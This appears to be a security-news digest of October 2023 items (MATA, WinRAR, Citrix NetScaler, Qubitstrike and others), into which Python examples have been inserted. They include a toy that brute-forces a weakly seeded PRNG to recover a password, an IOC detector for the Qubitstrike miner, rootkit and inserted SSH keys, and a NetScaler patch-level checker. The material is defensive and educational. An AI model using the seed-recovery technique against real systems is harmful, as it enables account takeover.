            AuditBoard revealed powerful new capabilities purpose-built to enable teams to automate critical workflows, surface key strategic insights, and stay on top of proliferating risks. These new platform enhancements further deliver on the promise of AuditBoard’s modern connected risk model, which leverages innovative, purpose-built solutions to help teams surface and manage more risk, work smarter with greater impact, and engage front-line stakeholders: AuditBoard AI: The rapid increase in the volume and velocity of risk and compliance … More

            The post AuditBoard unveils AI and analytics capabilities to help teams automate critical workflows appeared first on Help Net Security.

            "

            Autosummary: AuditBoard AI addresses this challenge by leveraging purpose-built, proprietary algorithms as well as the full spectrum of artificial intelligence technology, including generative AI, machine learning, and natural language processing to bring relevant insights, intelligent suggestions, and powerful automations across audit, risk, and compliance programs. "


            Sophisticated MATA Framework Strikes Eastern European Oil and Gas Companies

            industry
            2023-10-19 https://thehackernews.com/2023/10/sophisticated-mata-framework-strikes.html
            An updated version of a sophisticated backdoor framework called MATA has been used in attacks aimed at over a dozen Eastern European companies in the oil and gas sector and defense industry as part of a cyber espionage operation that took place between August 2022 and May 2023. "The actors behind the attack used spear-phishing mails to target several victims, some were infected with Windows "

            Autosummary: The cross-platform MATA framework was first documented by the Russian cybersecurity company Kaspersky in July 2020, linking it to the prolific North Korean state-sponsored crew in attacks targeting various sectors in Poland, Germany, Turkey, Korea, Japan, and India since April 2018.


            Vulnerability Scanning: How Often Should I Scan?

            exploits
            2023-10-19 https://thehackernews.com/2023/10/vulnerability-scanning-how-often-should.html
            The time between a vulnerability being discovered and hackers exploiting it is narrower than ever – just 12 days. So it makes sense that organizations are starting to recognize the importance of not leaving long gaps between their scans, and the term "continuous vulnerability scanning" is becoming more popular. Hackers won't wait for your next scan One-off scans can be a simple 'one-and-done'

            Autosummary: Hackers won't wait for your next scan. One-off scans can be a simple 'one-and-done' scan to prove your security posture to customers, auditors or investors, but more commonly they refer to periodic scans kicked off at semi-regular intervals – the industry standard has traditionally been quarterly. The simple truth is that new vulnerabilities are disclosed every day, so there's always the potential for a breach, even more so if you're often updating cloud services, APIs, and applications. Running thousands of checks, which include identifying misconfigurations, missing patches, and web layer issues, Intruder makes enterprise-grade vulnerability scanning easy and accessible to everyone.


            Google Play Protect Introduces Real-Time Code-Level Scanning for Android Malware

            exploits
            2023-10-19 https://thehackernews.com/2023/10/google-play-protect-introduces-real.html
            Google has announced an update to its Play Protect with support for real-time scanning at the code level to tackle novel malicious apps prior to downloading and installing them on Android devices. "Google Play Protect will now recommend a real-time app scan when installing apps that have never been scanned before to help detect emerging threats," the tech giant said. Google Play Protect is a "



            Fake KeePass site uses Google Ads and Punycode to push malware

            exploits
            2023-10-19 https://www.bleepingcomputer.com/news/security/fake-keepass-site-uses-google-ads-and-punycode-to-push-malware/
            A Google Ads campaign was found pushing a fake KeePass download site that used Punycode to appear as the official domain of the KeePass password manager to distribute malware. [...] "

            Autosummary: For example, "München" would be converted to "Mnchen-3ya," "α" would become "mxa," "правда" would be "80aafi6cg," and "도메인" would become "hq1bm8jm9l." Threat actors abuse Punycode to register domain names that appear similar to legitimate sites but with one character using unicode, to look slightly different. "


            India targets Microsoft, Amazon tech support scammers in nationwide crackdown

            financial
            2023-10-19 https://www.bleepingcomputer.com/news/security/india-targets-microsoft-amazon-tech-support-scammers-in-nationwide-crackdown/
            India"s Central Bureau of Investigation (CBI) raided 76 locations in a nationwide crackdown on cybercrime operations behind tech support scams and cryptocurrency fraud. [...] "

            Autosummary: "Based on evidence gathered during Operation Chakra-II, law enforcement agencies internationally are being notified of details of identified victims, Shell companies, identified money mules, identified proceeds of crime, details of co-accused/ support elements for comprehensive action to dismantle these criminal networks," the CBI said. "


            BlackCat ransomware uses new ‘Munchkin’ Linux VM in stealthy attacks

            exploits ransomware Linux
            2023-10-19 https://www.bleepingcomputer.com/news/security/blackcat-ransomware-uses-new-munchkin-linux-vm-in-stealthy-attacks/
            The BlackCat/ALPHV ransomware operation has begun to use a new tool named "Munchkin" that utilizes virtual machines to deploy encryptors on network devices stealthily. [...] "

            Autosummary: These scripts are listed below: [Figure: Structure of the image's filesystem. Source: Unit 42] The "controller" uses the bundled configuration file, which provides access tokens, victim credentials, and authentication secrets, as well as configuration directives, folder and file blocklists, tasks to run, and hosts to target for encryption.


            The hot topics from Europe's largest trade fair for IT security

            industry
            2023-10-19 https://www.malwarebytes.com/blog/news/2023/10/the-hot-topics-at-germany-s-it-sa

            Categories: News, Ransomware

            Tags: IT-SA, ransomware, AI, ChatGPT, NIS2

            The major talking points at IT-SA included ransomware, ChatGPT, and NIS2.

            The post The hot topics from Europe's largest trade fair for IT security appeared first on Malwarebytes Labs.

            "

            Autosummary: Businesses identified by the member states as operators of essential services in sectors such as energy, transport, water, banking, financial market infrastructures, healthcare, and digital infrastructure, will have to take appropriate security measures and notify relevant national authorities of serious incidents. All in all, I observed a lot of talks, and of the ones I heard that weren’t about promoting a product, most of them roughly fell into 3 categories: Ransomware, AI/ChatGPT, and NIS2. "


            Strengthening the weakest link: top 3 security awareness topics for your employees

            industry
            2023-10-19 https://www.welivesecurity.com/en/business-security/strengthening-weakest-link-top-3-security-awareness-topics-employees/
            Knowledge is a powerful weapon that can empower your employees to become the first line of defense against threats "

            Autosummary: Why training matters According to Verizon, three-quarters (74%) of all global breaches over the past year include the “human element,” which in many cases meant error, negligence or users falling victim to phishing and social engineering. One is threats from public Wi-Fi hotspots that might expose mobile workers to adversary-in-the-middle (AitM) attacks, where hackers access a network and eavesdrop on data travelling between connected devices and the router, and “evil twin” threats where criminals set up a duplicate Wi-Fi hotspot masquerading as a legitimate one in a specific location. Consider the following: 1) BEC and phishing Business Email Compromise (BEC) fraud, which leverages targeted phishing messages, remains one of the highest-earning cybercrime categories out there.


            Generative AI merges with intelligent malware, threat level rises

            exploits
            2023-10-18 https://www.helpnetsecurity.com/2023/10/18/organized-id-fraud/

            There has been a 44% increase in organized ID fraud in North America compared to preceding quarters, according to AU10TIX. This upsurge is believed to be driven by the ongoing economic recovery and inflationary pressures, particularly in the US market, which are emboldening professional ID fraud syndicates. Fraudsters target Asia-Pacific region Amid this escalation, the Asia-Pacific region emerges as the leading target for fraudsters, with over 4% of transactions flagged as an ID fraud attack. … More

            The post Generative AI merges with intelligent malware, threat level rises appeared first on Help Net Security.

            "

            Autosummary: This stark contrast highlights the importance of implementing a multilayered identity verification system incorporating liveness testing, biometric verification, and consortium validation, and demonstrates that professional fraudsters are still using traditional modes such as personal data and document numbers to generate synthetic identities used in coordinated attacks.


            The evolution of deception tactics from traditional to cyber warfare

            industry
            2023-10-18 https://www.helpnetsecurity.com/2023/10/18/admiral-james-a-winnefeld-acalvio-technologies-cyber-warfare/

            Admiral James A. Winnefeld, USN (Ret.), is the former vice chairman of the Joint Chiefs of Staff and is an advisor to Acalvio Technologies. In this Help Net Security interview, he compares the strategies of traditional and cyber warfare, discusses the difficulty of determining the attack’s nature, addresses ethical dilemmas, and promotes collaboration and cooperation with allies, partners, and, in some cases, even adversaries. Admiral Winnefeld, given your vast experience in military strategy and operations, … More

            The post The evolution of deception tactics from traditional to cyber warfare appeared first on Help Net Security.

            "

            Autosummary: In this Help Net Security interview, he compares the strategies of traditional and cyber warfare, discusses the difficulty of determining the attack’s nature, addresses ethical dilemmas, and promotes collaboration and cooperation with allies, partners, and, in some cases, even adversaries. This subtlety, combined with the constant evolution of cyber operations and capability, blurs the boundaries between random attacks, espionage, sabotage, and acts of warfare. Although not all countries or groups or individuals will adhere to international laws, having a clear understanding of the legal dimensions of cyber warfare will help clarify unacceptable parameters of attacks, including, for example, the loss of critical infrastructure systems that could harm large numbers of civilians.


            10 essential cybersecurity cheat sheets available for free

            ciber
            2023-10-18 https://www.helpnetsecurity.com/2023/10/18/cybersecurity-cheat-sheets/

            Cheat sheets are concise, to-the-point references tailored for instant insights. This article provides a curated list of 10 essential cybersecurity cheat sheets, all free to download. Whether you’re seeking a quick refresher or a beginner trying to make sense of it all, these resources will help. The ABCs of cybersecurity terms Whether you are looking to start a career in cybersecurity or actively wanting to protect your personal information, you will need to know and … More

            The post 10 essential cybersecurity cheat sheets available for free appeared first on Help Net Security.

            "

            Autosummary: This cheat sheet outlines tips and tools for analyzing malicious documents, such as Microsoft Office, RTF, and PDF files. "


            D-Link Confirms Data Breach: Employee Falls Victim to Phishing Attack

            financial
            2023-10-18 https://thehackernews.com/2023/10/d-link-confirms-data-breach-employee.html
            Taiwanese networking equipment manufacturer D-Link has confirmed a data breach that led to the exposure of what it said is "low-sensitivity and semi-public information." "The data was confirmed not from the cloud but likely originated from an old D-View 6 system, which reached its end of life as early as 2015," the company said. "The data was used for registration purposes back then. So far, no "



            TetrisPhantom: Cyber Espionage via Secure USBs Targets APAC Governments

            government
            2023-10-18 https://thehackernews.com/2023/10/tetrisphantom-cyber-espionage-via.html
            Government entities in the Asia-Pacific (APAC) region are the target of a long-running cyber espionage campaign dubbed TetrisPhantom. "The attacker covertly spied on and harvested sensitive data from APAC government entities by exploiting a particular type of secure USB drive, protected by hardware encryption to ensure the secure storage and transfer of data between computer systems," Kaspersky "



            New Admin Takeover Vulnerability Exposed in Synology's DiskStation Manager

            exploits
            2023-10-18 https://thehackernews.com/2023/10/new-admin-takeover-vulnerability.html
            A medium-severity flaw has been discovered in Synology's DiskStation Manager (DSM) that could be exploited to decipher an administrator's password and remotely hijack the account. "Under some rare conditions, an attacker could leak enough information to restore the seed of the pseudorandom number generator (PRNG), reconstruct the admin password, and remotely take over the admin account,"

            Autosummary: "Under some rare conditions, an attacker could leak enough information to restore the seed of the pseudorandom number generator (PRNG), reconstruct the admin password, and remotely take over the admin account," Claroty's Sharon Brizinov said in a Tuesday report.
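What makes a seed leak fatal is that a deterministic PRNG seeded from a small or guessable value lets anyone who learns (or can enumerate) the seed regenerate every value it ever produced, an admin password included. The toy below is an added example illustrating that failure mode and its fix; it is not Synology's code and says nothing about how DSM actually derives passwords. The timestamp-shaped seed, the two-hour search window and the 12-character length are this example's assumptions.

```python
from __future__ import annotations

import random
import secrets
import string
from typing import Optional

ALPHABET = string.ascii_letters + string.digits


def weak_password(seed: int, length: int = 12) -> str:
    """Anti-pattern: a password drawn from a deterministic PRNG (Mersenne Twister here)
    seeded with a low-entropy value such as a Unix timestamp. Same seed, same password."""
    rng = random.Random(seed)
    return "".join(rng.choice(ALPHABET) for _ in range(length))


def recover_seed(observed: str, seed_space: range) -> Optional[int]:
    """Attacker side: when the seed lives in a small space (here, timestamps within an
    hour either side of a guessed boot time), regenerate candidates until one reproduces
    the observed password. Each try costs one PRNG run, so the search is trivial."""
    for seed in seed_space:
        if weak_password(seed, len(observed)) == observed:
            return seed
    return None


def strong_password(length: int = 12) -> str:
    """Fix: draw from the OS CSPRNG via `secrets`. There is no seed to leak or recover."""
    return "".join(secrets.choice(ALPHABET) for _ in range(length))


if __name__ == "__main__":
    # Constructed scenario: a hypothetical appliance seeded its PRNG with its boot time.
    boot_time = 1_697_000_000
    leaked_pw = weak_password(boot_time)
    window = range(boot_time - 3600, boot_time + 3600)
    print("observed password:", leaked_pw)
    print("recovered seed:   ", recover_seed(leaked_pw, window))
    print("strong password:  ", strong_password())
```

The lesson generalises beyond passwords: session tokens, reset links and API keys minted from `random` (or any seeded PRNG) are recoverable by the same brute-force loop once the seed's entropy is small; only a CSPRNG closes that door.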


            D-Link confirms data breach, but downplayed the impact

            financial
            2023-10-18 https://securityaffairs.com/152631/hacking/d-link-confirmed-data-breach.html

            Taiwanese manufacturer D-Link confirmed a data breach after a threat actor offered stolen data for sale on BreachForums. The global networking equipment and technology company D-Link confirmed the breach after a threat actor earlier this month put the stolen data up for sale on the BreachForums platform. The company became aware of a claim of data […]

            The post D-Link confirms data breach, but downplayed the impact appeared first on Security Affairs.

            "

            Autosummary: Pierluigi Paganini, October 18, 2023. Taiwanese manufacturer D-Link confirmed a data breach after a threat actor offered stolen data for sale on BreachForums.


            Google links WinRAR exploitation to multiple state hacking groups

            exploits government
            2023-10-18 https://www.bleepingcomputer.com/news/security/google-links-winrar-exploitation-to-multiple-state-hacking-groups/
            Google says multiple state-backed hacking groups are gaining arbitrary code execution on targets' systems by exploiting a high-severity vulnerability in WinRAR, a compression software with over 500 million users. [...]

            Autosummary: "In recent weeks, Google's Threat Analysis Group (TAG) has observed multiple government-backed hacking groups exploiting the known vulnerability, CVE-2023-38831, in WinRAR, which is a popular file archiver tool for Windows," Google said today.


            Recently patched Citrix NetScaler bug exploited as zero-day since August

            exploits
            2023-10-18 https://www.bleepingcomputer.com/news/security/recently-patched-citrix-netscaler-bug-exploited-as-zero-day-since-august/
            A critical vulnerability tracked as CVE-2023-4966 in Citrix NetScaler ADC/Gateway devices has been actively exploited as a zero-day since late August, security researchers announced. [...] "

            Autosummary: Also, upgrading the appliances to the following firmware versions should be prioritized: NetScaler ADC and NetScaler Gateway 14.1-8.50 and later; NetScaler ADC and NetScaler Gateway 13.1-49.15 and later releases of 13.1; NetScaler ADC and NetScaler Gateway 13.0-92.19 and later releases of 13.0; NetScaler ADC 13.1-FIPS 13.1-37.164 and later releases of 13.1-FIPS; NetScaler ADC 12.1-FIPS 12.1-55.300 and later releases of 12.1-FIPS; NetScaler ADC 12.1-NDcPP 12.1-55.300 and later releases of 12.1-NDcPP. This is the second zero-day flaw Citrix fixes in its products this year.


            Qubitstrike attacks rootkit Jupyter Linux servers to steal credentials

            Linux
            2023-10-18 https://www.bleepingcomputer.com/news/security/qubitstrike-attacks-rootkit-jupyter-linux-servers-to-steal-credentials/
            Hackers are scanning for internet-exposed Jupyter Notebooks to breach servers and deploy a cocktail of malware consisting of a Linux rootkit, crypto miners, and password-stealing scripts. [...] "

            Autosummary: The script is responsible for most of the malicious activity on a compromised Linux server, including the following: download and run an XMRig miner disguised as "python-dev"; set up four cron jobs (apache2, apache2.2, netns, netns2) for the miner's and script's persistence; insert an attacker-controlled SSH key for persistent root access; install the "Diamorphine" LKM (loadable kernel module) rootkit that helps hide specific processes from monitoring tools; steal credentials from the breached endpoint and spread via SSH. Cado reports that mi.sh also performs some attack-optimization steps using an additional component named "kthreadd," such as detecting competing miners in the list of running processes and killing them, and using the "netstat" utility to shut connections to IPs flagged for cryptojacking.
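The indicators listed above are concrete enough to check for on a Linux host. Below is an added example (not Cado's tooling and not the campaign's own scripts) with one detector per indicator: the four cron persistence names, a process named python-dev, the Diamorphine module in lsmod, an SSH key missing from an allow-list, and a cross-view check for processes an LKM rootkit hides from the /proc directory listing. The command outputs and keys are constructed samples; reading the cron names as /etc/cron.d file names is this example's assumption, since the summary does not say where they live.

```python
from __future__ import annotations

import os
from typing import Callable, Iterable

# Indicators as summarised above (Cado findings via BleepingComputer).
CRON_IOC_NAMES = {"apache2", "apache2.2", "netns", "netns2"}   # persistence entries for miner/script
MINER_DISGUISE = "python-dev"                                  # XMRig renamed to look like a dev package
ROOTKIT_MODULE = "diamorphine"                                 # LKM rootkit that hides processes

# Constructed sample outputs standing in for `ls /etc/cron.d`, `lsmod`, `ps -eo pid,comm`
# and root's authorized_keys on a compromised Jupyter host. Not real incident data.
SAMPLE_CRON_D = ["e2scrub_all", "apache2", "netns2", "php"]
SAMPLE_LSMOD = (
    "Module                  Size  Used by\n"
    "diamorphine            16384  0\n"
    "ext4                  892928  1\n"
)
SAMPLE_PS = "    PID COMMAND\n      1 systemd\n   4242 python-dev\n   4300 python3\n"
SAMPLE_AUTHORIZED_KEYS = (
    "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleAllowedKey admin@jupyter\n"
    "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQExampleInsertedKey root@unknown\n"
)
KNOWN_KEYS = {"AAAAC3NzaC1lZDI1NTE5AAAAIExampleAllowedKey"}   # constructed allow-list of key blobs


def suspicious_cron_names(cron_d_names: Iterable[str]) -> list[str]:
    """Entries in /etc/cron.d whose names match the campaign's persistence names."""
    return sorted(n for n in cron_d_names if n in CRON_IOC_NAMES)


def rootkit_loaded(lsmod_output: str) -> bool:
    """True if `lsmod` lists the Diamorphine module (first column is the module name)."""
    lines = lsmod_output.strip().splitlines()[1:]            # skip "Module Size Used by"
    return any(line.split()[0].lower() == ROOTKIT_MODULE for line in lines if line.split())


def miner_pids(ps_output: str) -> list[int]:
    """PIDs whose command name is the disguised miner; expects `ps -eo pid,comm` output."""
    pids = []
    for line in ps_output.strip().splitlines()[1:]:
        parts = line.split(None, 1)
        if len(parts) == 2 and parts[1].strip() == MINER_DISGUISE:
            pids.append(int(parts[0]))
    return pids


def unlisted_pids(listed: set[int], exists: Callable[[int], bool], pid_max: int) -> list[int]:
    """Cross-view check. Diamorphine filters hidden tasks out of the /proc directory listing
    (getdents), but a path lookup of /proc/<pid> still succeeds, so a PID that exists yet is
    absent from the listing is being hidden. `ps` alone cannot see it; this can."""
    return [pid for pid in range(1, pid_max + 1) if pid not in listed and exists(pid)]


def live_unlisted_pids() -> list[int]:
    """Run the cross-view check against the real host (Linux only; scans up to pid_max)."""
    listed = {int(n) for n in os.listdir("/proc") if n.isdigit()}
    with open("/proc/sys/kernel/pid_max") as f:
        pid_max = int(f.read())
    return unlisted_pids(listed, lambda pid: os.path.exists(f"/proc/{pid}"), pid_max)


def unexpected_ssh_keys(authorized_keys: str, allowlist: set[str]) -> list[str]:
    """authorized_keys lines whose key blob is not on the allow-list (e.g. an attacker-inserted root key)."""
    bad = []
    for line in authorized_keys.splitlines():
        fields = line.split()
        if len(fields) >= 2 and fields[1] not in allowlist:
            bad.append(line)
    return bad


if __name__ == "__main__":
    print("cron IOCs:       ", suspicious_cron_names(SAMPLE_CRON_D))
    print("rootkit loaded:  ", rootkit_loaded(SAMPLE_LSMOD))
    print("miner PIDs:      ", miner_pids(SAMPLE_PS))
    print("unexpected keys: ", unexpected_ssh_keys(SAMPLE_AUTHORIZED_KEYS, KNOWN_KEYS))
```

Because the rootkit hides the miner from `ps`, the cron names, the loaded module and the cross-view PID check are the reliable signals; a `ps` grep for python-dev will only fire on hosts where the rootkit failed to load.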


            Plastic surgeries warned by the FBI that they are being targeted by cybercriminals

            ciber
            2023-10-18 https://www.tripwire.com/state-of-security/plastic-surgeries-warned-fbi-they-are-being-targeted-cybercriminals
            Plastic surgeries have been warned that they are being targeted by cybercriminals plotting to steal sensitive data - including patients' medical records and photographs - that will later be used for extortion. Read more in my article on the Tripwire State of Security blog.

            Autosummary: With the information that has been stolen and collated, criminals contact plastic surgeons and their patients via social media, email, text messages, and demand payment with the promise that if a ransom is paid the stolen sensitive data will not be published. "


            State-sponsored APTs are leveraging WinRAR bug

            exploits government
            2023-10-18 https://www.helpnetsecurity.com/2023/10/18/apts-winrar-cve-2023-38831/

            A number of government-backed APTs are exploiting CVE-2023-38831, a file extension spoofing vulnerability in WinRAR, a widely used file archiver utility for Windows. CVE-2023-38831 was patched in August 2023, along with another high-severity RCE vulnerability (CVE-2023-40477). Exploited as a zero-day by cybercriminals since April 2023, the vulnerability is now also being used by state-sponsored hacking groups. “The widespread exploitation of the WinRAR bug highlights that exploits for known vulnerabilities can be highly effective, despite … More

            The post State-sponsored APTs are leveraging WinRAR bug appeared first on Help Net Security.

            "

            Autosummary: “According to the Cluster25 visibility and considering the sophistication of the infection chain, the attack could be related with low-to-mid confidence to the Russian state-sponsored group APT28 (aka Fancy Bear, Sednit),” they added. "


            Citrix NetScaler bug exploited in the wild since August (CVE-2023-4966)

            exploits
            2023-10-18 https://www.helpnetsecurity.com/2023/10/18/cve-2023-4966/

            A recently patched Citrix NetScaler ADC/Gateway information disclosure vulnerability (CVE-2023-4966) has been exploited by attackers in the wild since late August 2023, Mandiant researchers have revealed. About CVE-2023-4966 Citrix’s security advisory, published on October 10, says that the vulnerability can lead to sensitive information disclosure, but did not explain what type of information can be disclosed to attackers. CVE-2023-4966 is exploitable remotely without authentication, and a successful attack does not hinge on user interaction. The … More

            The post Citrix NetScaler bug exploited in the wild since August (CVE-2023-4966) appeared first on Help Net Security.

            "

            Autosummary: The vulnerability impacts the following NetScaler ADC and Gateway appliances: NetScaler ADC and NetScaler Gateway 14.1 before 14.1-8.50; NetScaler ADC and NetScaler Gateway 13.1 before 13.1-49.15; NetScaler ADC and NetScaler Gateway 13.0 before 13.0-92.19; NetScaler ADC 13.1-FIPS before 13.1-37.164; NetScaler ADC 12.1-FIPS before 12.1-55.300; NetScaler ADC 12.1-NDcPP before 12.1-55.300. Only appliances configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or authorization and accounting (AAA) virtual server are vulnerable.


            Lazarus Group Targeting Defense Experts with Fake Interviews via Trojanized VNC Apps

            exploits
            2023-10-18 https://thehackernews.com/2023/10/lazarus-group-targeting-defense-experts.html
            The North Korea-linked Lazarus Group (aka Hidden Cobra or TEMP.Hermit) has been observed using trojanized versions of Virtual Network Computing (VNC) apps as lures to target the defense industry and nuclear engineers as part of a long-running campaign known as Operation Dream Job. "The threat actor tricks job seekers on social media into opening malicious apps for fake job interviews," Kaspersky "



            Critical Citrix NetScaler Flaw Exploited to Target Government, Tech Firms

            exploits government
            2023-10-18 https://thehackernews.com/2023/10/critical-citrix-netscaler-flaw.html
            Citrix is warning of exploitation of a recently disclosed critical security flaw in NetScaler ADC and Gateway appliances that could result in exposure of sensitive information. Tracked as CVE-2023-4966 (CVSS score: 9.4), the vulnerability impacts the following supported versions - NetScaler ADC and NetScaler Gateway 14.1 before 14.1-8.50 NetScaler ADC and NetScaler Gateway 13.1 before "



            Threat actors have been exploiting CVE-2023-4966 in Citrix NetScaler ADC/Gateway devices since August

            exploits
            2023-10-18 https://securityaffairs.com/152656/hacking/citrix-netscaler-adc-gateway-zero-day.html

            Experts reported that the vulnerability CVE-2023-4966 in Citrix NetScaler ADC/Gateway devices has been exploited in attacks since late August. On October 10, Citrix published a security bulletin related to a critical vulnerability, tracked as CVE-2023-4966, in Citrix NetScaler ADC/Gateway devices. “Exploits of CVE-2023-4966 on unmitigated appliances have been observed.” reported Citrix. “Cloud Software Group strongly urges customers of […]

            The post Threat actors have been exploiting CVE-2023-4966 in Citrix NetScaler ADC/Gateway devices since August appeared first on Security Affairs.

            "

            Autosummary: “Cloud Software Group strongly urges customers of NetScaler ADC and NetScaler Gateway to install the relevant updated versions of NetScaler ADC and NetScaler Gateway as soon as possible: NetScaler ADC and NetScaler Gateway 14.1-8.50 and later releases; NetScaler ADC and NetScaler Gateway 13.1-49.15 and later releases of 13.1; NetScaler ADC and NetScaler Gateway 13.0-92.19 and later releases of 13.0; NetScaler ADC 13.1-FIPS 13.1-37.164 and later releases of 13.1-FIPS; NetScaler ADC 12.1-FIPS 12.1-55.300 and later releases of 12.1-FIPS; NetScaler ADC 12.1-NDcPP 12.1-55.300 and later releases of 12.1-NDcPP. Note: NetScaler ADC and NetScaler Gateway version 12.1 is now End-of-Life (EOL).”
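Four items above quote the same fixed-build list for CVE-2023-4966. Turning it into a fleet check means parsing the version banner and comparing build numbers as integer tuples, not as decimals (8.50 is not 8.5, and 49.15 is newer than 49.13), and remembering two caveats from the summaries: 12.1 without FIPS/NDcPP is End-of-Life with no fix, and only appliances configured as a Gateway or AAA virtual server are exposed. The script below is an added example, not Citrix tooling. The banner shape it parses (`NetScaler NS13.1: Build 49.13.nc, Date: ...`, as printed by `show ns version`) and every sample banner are this example's assumptions, and the caller must supply the FIPS/NDcPP edition because the banner alone does not encode it.

```python
from __future__ import annotations

import re
from typing import Tuple

# Fixed builds per (release, edition), from the Citrix advisory as quoted above.
FIXED_BUILDS = {
    ("14.1", "standard"): (8, 50),
    ("13.1", "standard"): (49, 15),
    ("13.0", "standard"): (92, 19),
    ("13.1", "fips"): (37, 164),
    ("12.1", "fips"): (55, 300),
    ("12.1", "ndcpp"): (55, 300),
}
# 12.1 without FIPS/NDcPP is End-of-Life: no fixed build exists, so such an appliance stays exposed.
EOL_RELEASES = {("12.1", "standard")}

# Assumed banner shape, e.g. "NetScaler NS13.1: Build 49.13.nc, Date: Sep 7 2023".
BANNER_RE = re.compile(r"NetScaler NS(?P<release>\d+\.\d+): Build (?P<build>\d+\.\d+)")


def parse_banner(banner: str) -> Tuple[str, Tuple[int, ...]]:
    """Return (release, build) with the build as an int tuple so that (8, 50) > (8, 49)
    and a float comparison's 8.50 == 8.5 mistake cannot happen."""
    m = BANNER_RE.search(banner)
    if not m:
        raise ValueError(f"unrecognised version banner: {banner!r}")
    build = tuple(int(part) for part in m.group("build").split("."))
    return m.group("release"), build


def assess(banner: str, edition: str = "standard", gateway_or_aaa: bool = True) -> str:
    """Classify one appliance against CVE-2023-4966's fixed builds. Returns one of:
    patched, vulnerable, unpatched-not-exposed, eol-unpatched, unknown-branch."""
    release, build = parse_banner(banner)
    key = (release, edition)
    if key in EOL_RELEASES:
        return "eol-unpatched"
    fixed = FIXED_BUILDS.get(key)
    if fixed is None:
        return "unknown-branch"
    if build >= fixed:
        return "patched"
    # Below the fixed build. Exploitable only when a Gateway (VPN vserver, ICA Proxy, CVPN,
    # RDP Proxy) or AAA virtual server is configured, per the Help Net Security summary above.
    return "vulnerable" if gateway_or_aaa else "unpatched-not-exposed"


if __name__ == "__main__":
    # Constructed sample fleet (banner, edition, gateway/AAA configured). Not real inventory.
    fleet = [
        ("NetScaler NS13.1: Build 49.13.nc, Date: Sep 7 2023", "standard", True),
        ("NetScaler NS13.1: Build 49.13.nc, Date: Sep 7 2023", "standard", False),
        ("NetScaler NS14.1: Build 8.50.nc, Date: Oct 3 2023", "standard", True),
        ("NetScaler NS12.1: Build 55.300.nc, Date: Oct 3 2023", "fips", True),
        ("NetScaler NS12.1: Build 65.25.nc, Date: Jun 1 2023", "standard", True),
    ]
    for banner, edition, exposed in fleet:
        print(f"{banner.split(',')[0]:<36} {edition:<9} exposed={exposed!s:<5} -> {assess(banner, edition, exposed)}")
```

An "unpatched-not-exposed" result is a patching backlog, not a closed incident: Mandiant's finding that exploitation began in late August means any appliance that was exposed at any point since then also needs its sessions reviewed, not just its build bumped.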


            Google Play Protect adds real-time scanning to fight Android malware

            exploits
            2023-10-18 https://www.bleepingcomputer.com/news/security/google-play-protect-adds-real-time-scanning-to-fight-android-malware/
            Google has announced new, real-time scanning features for Google Play Protect that make it harder for malicious apps employing polymorphism to evade detection. [...]

            Autosummary: Real-time code scans Google's Play Protect platform is Android's built-in protection system for performing on-device scans for unwanted software and malware, powered by data derived from 125 billion daily scans.


            MATA malware framework exploits EDR in attacks on defense firms

            exploits
            2023-10-18 https://www.bleepingcomputer.com/news/security/mata-malware-framework-exploits-edr-in-attacks-on-defense-firms/
            An updated version of the MATA backdoor framework was spotted in attacks between August 2022 and May 2023, targeting oil and gas firms and the defense industry in Eastern Europe. [...] "

            Autosummary: The latest version of MATA comes in DLL form and features extensive remote control capabilities, supports multi-protocol (TCP, SSL, PSSL, PDTLS) connections to the control servers, and supports proxy (SOCKS4, SOCKS5, HTTP+web, HTTP+NTLM) server chains. Other interesting findings include a new malware module that can leverage removable storage media such as USB to infect air-gapped systems, various stealers capable of capturing credentials, cookies, screenshots, and clipboard contents, and EDR/security bypass tools. "


            Google links WinRAR exploitation to Russian, Chinese state hackers

            exploits government rusia-ucrania
            2023-10-18 https://www.bleepingcomputer.com/news/security/google-links-winrar-exploitation-to-russian-chinese-state-hackers/
            Google says that several state-backed hacking groups have joined ongoing attacks exploiting a high-severity vulnerability in WinRAR, a compression software used by over 500 million users, aiming to gain arbitrary code execution on targets' systems. [...] "

            Autosummary: "In recent weeks, Google's Threat Analysis Group (TAG) has observed multiple government-backed hacking groups exploiting the known vulnerability, CVE-2023-38831, in WinRAR, which is a popular file archiver tool for Windows," Google TAG said today. "


            Ukrainian activists hack Trigona ransomware gang, wipe servers

            exploits ransomware
            2023-10-18 https://www.bleepingcomputer.com/news/security/ukrainian-activists-hack-trigona-ransomware-gang-wipe-servers/
            A group of cyber activists under the Ukrainian Cyber Alliance banner has hacked the servers of the Trigona ransomware gang and wiped them clean after copying all the information available. [...] "

            Autosummary: For a while, the cybercriminals were sufficiently active to compromise in a single month at least 15 companies in the manufacturing, finance, construction, agriculture, marketing, and high technology sectors. "


            North Korean hackers exploit critical TeamCity flaw to breach networks

            exploits government
            2023-10-18 https://www.bleepingcomputer.com/news/security/north-korean-hackers-exploit-critical-teamcity-flaw-to-breach-networks/
            Microsoft says that the North Korean Lazarus and Andariel hacking groups are exploiting the CVE-2023-42793 flaw in TeamCity servers to deploy backdoor malware, likely to conduct software supply chain attacks. [...] "

            Autosummary: Lazarus has been linked to various espionage, data theft, and financial gain attacks, including targeting security researchers, trojanizing open-source crypto platforms, performing massive cryptocurrency heists, and conducting fake job interviews to distribute malware. "


            Cisco IOS XE vulnerability widely exploited in the wild

            exploits
            2023-10-18 https://www.malwarebytes.com/blog/news/2023/10/cisco-ios-xe-vulnerability-widely-exploited-in-the-wild

            Categories: Exploits and vulnerabilities

            Categories: News

            Tags: Cisco

            Tags: IOS X

            Tags: remote management

            Tags: vulnerability

            Tags: CVE-2023-20198

            Tags: webUI

            Tags: hxxp server

            Tags: hxxp secure-server

            Researchers have found that a recently disclosed vulnerability in Cisco IOS XE has already resulted in thousands of compromised devices.


            The post Cisco IOS XE vulnerability widely exploited in the wild appeared first on Malwarebytes Labs.

            "

            Autosummary: To determine whether the HTTP Server feature is enabled for a system, log in to the system and use the show running-config | include ip http server|secure|active command in the CLI to check for the presence of the ip http server command or the ip http secure-server command in the global configuration. Cisco IOS XE is a universally deployed Internetworking Operating System (IOS) that enables model-driven programmability, application hosting, and configuration management, helping to automate day-to-day tasks. "


            ELITEWOLF: NSA’s repository of signatures and analytics to secure OT

            industry
            2023-10-17 https://www.helpnetsecurity.com/2023/10/17/elitewolf-nsa/

